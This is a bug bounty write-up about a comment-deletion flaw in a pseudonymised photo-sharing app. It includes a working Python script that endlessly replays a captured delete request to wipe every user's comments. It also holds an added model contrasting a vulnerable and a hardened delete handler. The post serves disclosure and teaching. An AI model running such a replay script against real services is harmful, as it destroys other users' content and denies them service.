From N/A to $$$: A Simple Python Script Led to Application-Level DoS

Hashim Amin
Jan 9, 2025


Hello, friend! This is mrhashimamin. I miss you, I really do. This is an old story (well, actually just 2 months ago, but I’m doing this for you, mi amigo 3>).

It’s about a bug I found in a public bug bounty program (I won’t disclose anything that might reveal the target, but I guess you’ll figure it out, xD). Let’s call it images-app.com.

It’s a social media app for sharing photos, memes, etc. Users can react to/add comments on those photos, along with a bunch of other interesting features.

The Not Applicable (N/A) Disaster

After a few days of using the app as a regular user, reviewing disclosed reports of old bugs, and testing core functions (reset, login, signup), I decided to focus on the comment feature.

I started by manipulating parameters when adding a comment, trying to edit someone else’s comment, and triggering any detailed or unknown errors. Nothing worked.

But here’s the thing: when I deleted my own comment for the first time, the server responded with a 200 OK (as expected). However, when I sent the same request multiple times, it still returned 200 OK every time.

“So what?” you might ask. Let’s go back to the photo I was testing on. And yeah…all comments were deleted!

Before Script
After Script

My Mistake (Don’t Do This, Please)

I was too fkn rash and reported it immediately without fully understanding why it happened. And yeah, this is what went down.

So, please, take your time and always try to escalate anything you find. Give it some time, dig deeper, and if you still find nothing more impactful, then go ahead and report it.

Why Was This a Mistake?

Well, when the triager tried to reproduce this, he actually couldn’t. Here’s the thing: when you send the delete request more than once (e.g., 3 times), you end up deleting your own comment + two other comments — but only until a new comment is added by another user. Then, the comments come back again.

After adding new comment
First Reply

So, in the end, I didn’t really do anything that had a real impact. They closed it as N/A because they couldn’t reproduce it.

Making It a Real Bug

I switched to another function again and again for two weeks until I had this thought: “Why wouldn’t I use a Python script to automate the whole process over and over?”

So, I created a simple Python script to turn this into a valid bug. Here are the steps:

  1. The attacker chooses any image and posts a comment on it.
  2. The attacker attempts to delete his own comment, captures the request, and saves it to req.txt.
  3. The attacker uses this Python script to send the request multiple times, every 5 seconds (or less).
  4. Any new comment added by a user will be deleted, along with all existing comments, denying users from using the comment function.

Python Script:

# Thanks to Chat-GPT btw
import requests
import time

# Function to parse req.txt (the raw delete request saved from the proxy)
def parse_request(file_path):
    with open(file_path, "r") as file:
        lines = file.readlines()

    # Parse the request line, e.g. "POST /some/path HTTP/1.1"
    request_line = lines[0].strip()
    method, url_path, http_version = request_line.split(" ")
    base_url = "https://www.images-app.com"
    url = base_url + url_path

    # Parse headers (up to the first blank line) and the body (everything after it)
    headers = {}
    body_lines = []
    is_body = False
    for line in lines[1:]:
        line = line.strip()
        if not line and not is_body:
            is_body = True
            continue
        if is_body:
            body_lines.append(line)
        else:
            key, value = line.split(": ", 1)
            headers[key] = value
    body = "\n".join(body_lines) if body_lines else None

    # Let requests compute Content-Length for the body it actually sends;
    # the value copied from the file may no longer match
    headers.pop("Content-Length", None)

    return method, url, headers, body

# Function to send the same request five times in a row
def send_request(method, url, headers, body):
    for _ in range(5):
        response = requests.request(method, url, headers=headers, data=body)
        print(f"Sent request: {response.status_code}")
    print("$ Waiting for the next cycle $")

# Main loop: a burst of five requests, then a 30-second pause, forever
file_path = "req.txt"
while True:
    # Re-read req.txt each cycle so the request (e.g. a refreshed cookie) can be edited on the fly
    method, url, headers, body = parse_request(file_path)

    # Send the burst
    send_request(method, url, headers, body)

    # Wait 30 seconds before the next cycle
    time.sleep(30)
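To make the server-side lesson concrete, here is an added example, not code from the post and not images-app.com’s code (the real implementation and the real root cause are not known). It is a small in-memory model of a comment-delete endpoint. The vulnerable handler is a hypothetical one that identifies the target by its position in a newest-first comment list, which is one way to get exactly the effect described in “Why Was This a Mistake?” and in step 4 above: replaying the same delete keeps removing whatever comment is newest, including anything a user posts afterwards. The hardened handler resolves the comment by its id, checks that the requester owns it, and treats a replay as a no-op 404. All names and sample comments are constructed.

```python
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Comment:
    comment_id: int
    author: str
    text: str


@dataclass
class Photo:
    # Newest comment first, the way a feed usually renders them (assumption).
    comments: list[Comment] = field(default_factory=list)
    next_id: int = 1

    def add_comment(self, author: str, text: str) -> Comment:
        comment = Comment(self.next_id, author, text)
        self.next_id += 1
        self.comments.insert(0, comment)
        return comment


def delete_vulnerable(photo: Photo, position: int) -> int:
    """Hypothetical buggy handler: the request names the comment by its position
    in the list, so once the original is gone the same request hits the next
    comment. No ownership check, and every call answers 200, as the post observed."""
    if 0 <= position < len(photo.comments):
        del photo.comments[position]
    return 200


def delete_hardened(photo: Photo, comment_id: int, requester: str) -> int:
    """Owner-scoped, id-keyed, idempotent delete. Returns an HTTP-style status."""
    for index, comment in enumerate(photo.comments):
        if comment.comment_id == comment_id:
            if comment.author != requester:
                return 403  # not the caller's comment (many APIs answer 404 here to avoid leaking existence)
            del photo.comments[index]
            return 204
    return 404  # already gone: a replayed request changes nothing


def seed_photo() -> tuple[Photo, int]:
    """Constructed sample data: three other users comment, then the attacker does."""
    photo = Photo()
    photo.add_comment("alice", "nice shot")
    photo.add_comment("bob", "lol")
    photo.add_comment("carol", "where is this?")
    mine = photo.add_comment("attacker", "placeholder")
    return photo, mine.comment_id


def replay_attack(hardened: bool) -> tuple[list[str], list[int]]:
    """Replays the attacker's own delete request three times, then once more
    after another user comments, mirroring what the script above does.
    Returns the authors still present (newest first) and each request's status."""
    photo, mine = seed_photo()

    def send_delete() -> int:
        if hardened:
            return delete_hardened(photo, mine, "attacker")
        return delete_vulnerable(photo, 0)  # attacker's comment is newest, so position 0

    statuses = [send_delete() for _ in range(3)]
    photo.add_comment("dave", "new comment")  # lands at position 0 in the newest-first list
    statuses.append(send_delete())
    return [c.author for c in photo.comments], statuses


if __name__ == "__main__":
    print("vulnerable:", replay_attack(hardened=False))
    print("hardened:  ", replay_attack(hardened=True))
```

The vulnerable path ends with only the oldest comment surviving and a 200 on every replay, which is the “all comments were deleted, and new ones vanish too” picture from the screenshots. The hardened path returns 204 once and 404 on each replay, and dave’s comment stays. Whatever the real cause was on the target, the fix has the same shape: a delete must be keyed by a stable identifier, scoped to objects the caller owns, and safe to repeat.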

After they triaged it and accepted it as a P3, they downgraded it to a P4 (yeah, typical scam as usual).

Never mind, that’s the story for today. I hope you find this write-up useful. Thanks, and keep hacking 3>
